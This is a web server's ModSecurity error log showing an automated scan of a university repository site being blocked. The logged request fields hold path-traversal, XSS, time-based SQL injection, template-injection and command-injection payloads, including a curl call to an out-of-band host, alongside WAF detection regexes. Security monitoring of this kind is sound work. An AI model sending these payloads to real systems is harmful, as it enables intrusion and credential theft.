[Tue Aug 29 11:38:10.752658 2023] [:error] [pid 1506] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXi3z0AAAAP"]
[Tue Aug 29 11:38:14.730189 2023] [:error] [pid 1510] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.79.49.154_4beac20f66f8a379a801308d5aeb55f6d68ce5e4"): Internal error [hostname "repository.unla.ac.id"] [uri "/index.php/manager/html"] [unique_id "ZO12NsCo-f0AAAXm79EAAAAW"]
[Tue Aug 29 11:38:15.085254 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "169.150.212.168_e991296ab110e743013426bd94a6b1c96c64612b"): Internal error [hostname "repository.unla.ac.id"] [uri "/index.php/manager/html"] [unique_id "ZO12NsCo-f0AAAXWLK4AAAAD"]
[Tue Aug 29 11:38:23.384786 2023] [:error] [pid 1523] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAXz7AsAAAAk"]
[Tue Aug 29 11:38:33.369504 2023] [:error] [pid 1550] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAYOaD4AAAAa"]
[Tue Aug 29 11:38:34.479319 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:url: #{T(java.net.InetAddress).getByName('cjmnbitjmimt14dgn26goq6hn3cpipz9m.oast.site')}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js"] [unique_id "ZO12SsCo-f0AAARiDxcAAAAJ"]
[Tue Aug 29 11:38:34.481516 2023] [:error] [pid 1467] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAW7FUgAAAAE"]
[Tue Aug 29 11:38:35.368226 2023] [:error] [pid 1546] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAYKOQ0AAAAP"]
[Tue Aug 29 11:38:46.417498 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAARiDz8AAAAJ"]
[Tue Aug 29 11:38:47.371990 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAXVytkAAAAB"]
[Tue Aug 29 11:38:47.428367 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAXbb8EAAAAL"]
[Tue Aug 29 11:38:56.365488 2023] [:error] [pid 1497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAXZhQMAAAAH"]
[Tue Aug 29 11:38:57.380772 2023] [:error] [pid 1568] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAYgzgkAAAAE"]
[Tue Aug 29 11:38:57.387905 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAYMWLIAAAAR"]
[Tue Aug 29 11:39:06.857846 2023] [:error] [pid 1510] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12asCo-f0AAAXm8FwAAAAW"]
[Tue Aug 29 11:39:07.059573 2023] [:error] [pid 1563] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAYb5wIAAAAI"]
[Tue Aug 29 11:39:12.014995 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12cMCo-f0AAAYcurwAAAAN"]
[Tue Aug 29 11:39:12.375524 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12cMCo-f0AAAaJJroAAAAJ"]
[Tue Aug 29 11:39:12.673369 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12cMCo-f0AAAaJJsgAAAAJ"]
[Tue Aug 29 11:39:13.330192 2023] [:error] [pid 1700] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAakQTAAAAAr"]
[Tue Aug 29 11:39:18.660229 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: nuclei%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO12dsCo-f0AAAXbcC4AAAAL"]
[Tue Aug 29 11:39:23.564281 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAaJJucAAAAJ"]
[Tue Aug 29 11:39:36.547472 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAXYiWEAAAAG"]
[Tue Aug 29 11:39:48.430434 2023] [:error] [pid 1700] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAakQb4AAAAr"]
[Tue Aug 29 11:39:56.471759 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAagE6AAAAAn"]
[Tue Aug 29 11:40:02.581277 2023] [:error] [pid 1569] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26g3hw4tg4m6ezng.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12osCo-f0AAAYh9dYAAAAK"]
[Tue Aug 29 11:40:05.584452 2023] [:error] [pid 1563] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO12pcCo-f0AAAYb55kAAAAI"]
[Tue Aug 29 11:40:07.384626 2023] [:error] [pid 1569] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAYh9doAAAAK"]
[Tue Aug 29 11:40:07.391440 2023] [:error] [pid 1803] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAcL6yQAAAAM"]
[Tue Aug 29 11:40:12.427635 2023] [:error] [pid 1691] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAAab9TkAAAAV"]
[Tue Aug 29 11:40:22.407832 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAXbcLgAAAAL"]
[Tue Aug 29 11:40:22.645138 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAcYU1AAAAAp"]
[Tue Aug 29 11:40:32.435442 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAcbR@QAAAAv"]
[Tue Aug 29 11:40:33.419225 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAQSWlkAAAA0"]
[Tue Aug 29 11:40:36.384691 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAcoNMcAAAAF"]
[Tue Aug 29 11:40:37.408726 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAcbR-YAAAAv"]
